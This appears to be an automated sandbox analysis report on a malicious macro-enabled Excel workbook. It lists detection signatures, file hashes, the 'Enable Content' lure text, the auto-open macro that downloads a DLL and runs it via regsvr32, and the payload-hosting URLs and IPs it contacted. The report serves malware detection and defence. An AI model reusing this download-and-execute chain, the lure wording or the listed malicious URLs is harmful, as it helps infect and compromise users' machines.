Analysis Report documents-2112491607.xlsm

Overview

General Information

Sample Name:	documents-2112491607.xlsm
Analysis ID:	383123
MD5:	cada6b07929cd03002206f65f547f383
SHA1:	e4b72830f1f320d711f60f540a8fe9340597238e
SHA256:	b9b231cad810dedef1d27772b12d04e8aa4e9ef0f461d5a0fbf80d3c38918860
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Machine Learning detection for dropped file

Office process drops PE file

Allocates a big amount of memory (probably used for heap spraying)

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Excel documents contains an embedded macro which executes code when the document is opened

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Yara detected Xls With Macro 4.0

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://kautilyaclasses.com/ds/index.html	Avira URL Cloud: Label: malware
Source: http://kullumanalitours.com/ds/index.html	Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\Users\user\oeiwkd4.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htm	Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\oeiwkd4.dll

Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: index[1].htm.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 126MB

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: katelynn9506a.ru.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 8.211.4.209:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 8.211.4.209:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2009897 ET TROJAN Possible Windows executable sent when remote host claims to send html content 111.118.215.222:80 -> 192.168.2.22:49171

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 8.211.4.209 8.211.4.209

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /index.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: katelynn9506a.ru.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /index.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: corwin-tommie06f.ru.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kautilyaclasses.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kullumanalitours.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bodylanguage.santulan.co.inConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45BFE498.png

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /index.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: katelynn9506a.ru.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /index.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: corwin-tommie06f.ru.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kautilyaclasses.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kullumanalitours.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bodylanguage.santulan.co.inConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: katelynn9506a.ru.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Wed, 07 Apr 2021 07:15:00 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16X-Powered-By: PHP/5.4.16Content-Length: 78Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /index.html was not found on this server.

Source: regsvr32.exe, 00000003.00000002.2091998985.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092597864.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2093476995.0000000001C10000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2094439546.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2094938735.0000000001D30000.00000002.00000001.sdmp

String found in binary or memory: http://servername/isapibackend.dll

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 4	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 15	Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
Source: Document image extraction number: 15	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Source: Screenshot number: 8	Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 8	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU

Found Excel 4.0 Macro with suspicious formulas

Source: documents-2112491607.xlsm

Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Source: documents-2112491607.xlsm

Initial sample: Sheet size: 27819

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\oeiwkd4.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htm			Jump to dropped file

Excel documents contains an embedded macro which executes code when the document is opened

Source: workbook.xml

Binary string: " sheetId="5" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_open">'Doc1'!$AO$41</definedName></definedNames><calcPr calcId="122211"/></workbook>

Source: classification engine

Classification label: mal100.expl.evad.winXLSM@11/12@5/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$documents-2112491607.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC4E4.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\oeiwkd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\oeiwkd	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: documents-2112491607.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: documents-2112491607.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: documents-2112491607.xlsm	Initial sample: OLE zip file path = xl/media/image3.png
Source: documents-2112491607.xlsm	Initial sample: OLE zip file path = xl/media/image4.png
Source: documents-2112491607.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: documents-2112491607.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: documents-2112491607.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\oeiwkd4.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htm			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\oeiwkd4.dll

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htm

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\oeiwkd4.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\oeiwkd4.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htm			Jump to dropped file

HIPS / PFW / Operating System Protection Evasion:

Yara detected Xls With Macro 4.0

Source: Yara match

File source: app.xml, type: SAMPLE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.211.216.55	kullumanalitours.com	Seychelles	394695	PUBLIC-DOMAIN-REGISTRYUS	false
192.185.56.250	kautilyaclasses.com	United States	46606	UNIFIEDLAYER-AS-1US	false
8.211.4.209	corwin-tommie06f.ru.com	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
111.118.215.222	bodylanguage.santulan.co.in	India	394695	PUBLIC-DOMAIN-REGISTRYUS	true

Contacted Domains

Name	IP	Active
kautilyaclasses.com	192.185.56.250	true
bodylanguage.santulan.co.in	111.118.215.222	true
corwin-tommie06f.ru.com	8.211.4.209	true
katelynn9506a.ru.com	8.211.4.209	true
kullumanalitours.com	103.211.216.55	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://corwin-tommie06f.ru.com/index.html	false	Avira URL Cloud: safe	unknown
http://kautilyaclasses.com/ds/index.html	true	Avira URL Cloud: malware	unknown
http://katelynn9506a.ru.com/index.html	false	Avira URL Cloud: safe	unknown
http://bodylanguage.santulan.co.in/ds/index.html	true	Avira URL Cloud: safe	unknown
http://kullumanalitours.com/ds/index.html	true	Avira URL Cloud: malware	unknown

ID:	383123
Product:	CloudBasic
Start time:	09:14:09
Start date:	07.04.2021
Sample:	documents-2112491607.xlsm
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	cada6b07929cd03002206f65f547f383
SHA1:	e4b72830f1f320d711f60f540a8fe9340597238e
SHA256:	b9b231cad810dedef1d27772b12d04e8aa4e9ef0f461d5a0fbf80d3c38918860
Filetype:	Excel Microsoft Office Open XML Format document (40004/1) 83.33%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htm	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	A26AB60FB8F4C1FCB0A37955433F241B	E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B	3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45BFE498.png	PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced	D8574C9CC4123EF67C8B600850BE52EE	5547AC473B3523BA2410E04B75E37B1944EE0CCC	ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4647BF2F.png	PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced	780FD0ABF9055E2D8FA1BAB6D4B9163E	CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE	6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52AB2BB9.png	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	A516B6CB784827C6BDE58BC9D341C1BD	9D602E7248E06FF639E6437A0A16EA7A4F9E6C73	EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB2DEE66.png	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	02DB1068B56D3FD907241C2F3240F849	58EC338C879DDBDF02265CBEFA9A2FB08C569D20	D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
C:\Users\user\AppData\Local\Temp\FBCE0000	data	00AF2D8EB13A69B0A52ABFB800D69F9F	3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1	0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 15:14:37 2021, atime=Wed Apr 7 15:14:37 2021, length=8192, window=hide	9C40617F346B87D23DC5454B7267E33A	B87124245ACDB8EDF4EE972366790CC463CDBDDC	223CD23880148DA3DEC1729E43E7735385478231A1BDE95A0E89C438C420623B
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documents-2112491607.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Apr 7 15:14:37 2021, atime=Wed Apr 7 15:14:37 2021, length=96847, window=hide	FD2F42E72FB642FA79B3F38914DB4B03	96D1AD382852122C29334DFB5CE89A13DD14C8F3	8C69F2F1A47257D91955C5E9AC888608AA6234EEECFEAD7BCEB4B268B747ECBA
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	153B80C9C6025C6926C8F0A15B781156	A4B5E632F8E2282BA31EF56938E23F0BAC5DAD1F	1E02E4944F11BD25D085F2B96AECB9912DEBC942C411D1E85603DFFCF69E2F65
C:\Users\user\Desktop\ECCE0000	data	00AF2D8EB13A69B0A52ABFB800D69F9F	3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1	0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603
C:\Users\user\Desktop\~$documents-2112491607.xlsm	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\user\oeiwkd4.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	A26AB60FB8F4C1FCB0A37955433F241B	E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B	3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6

Analysis Report documents-2112491607.xlsm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs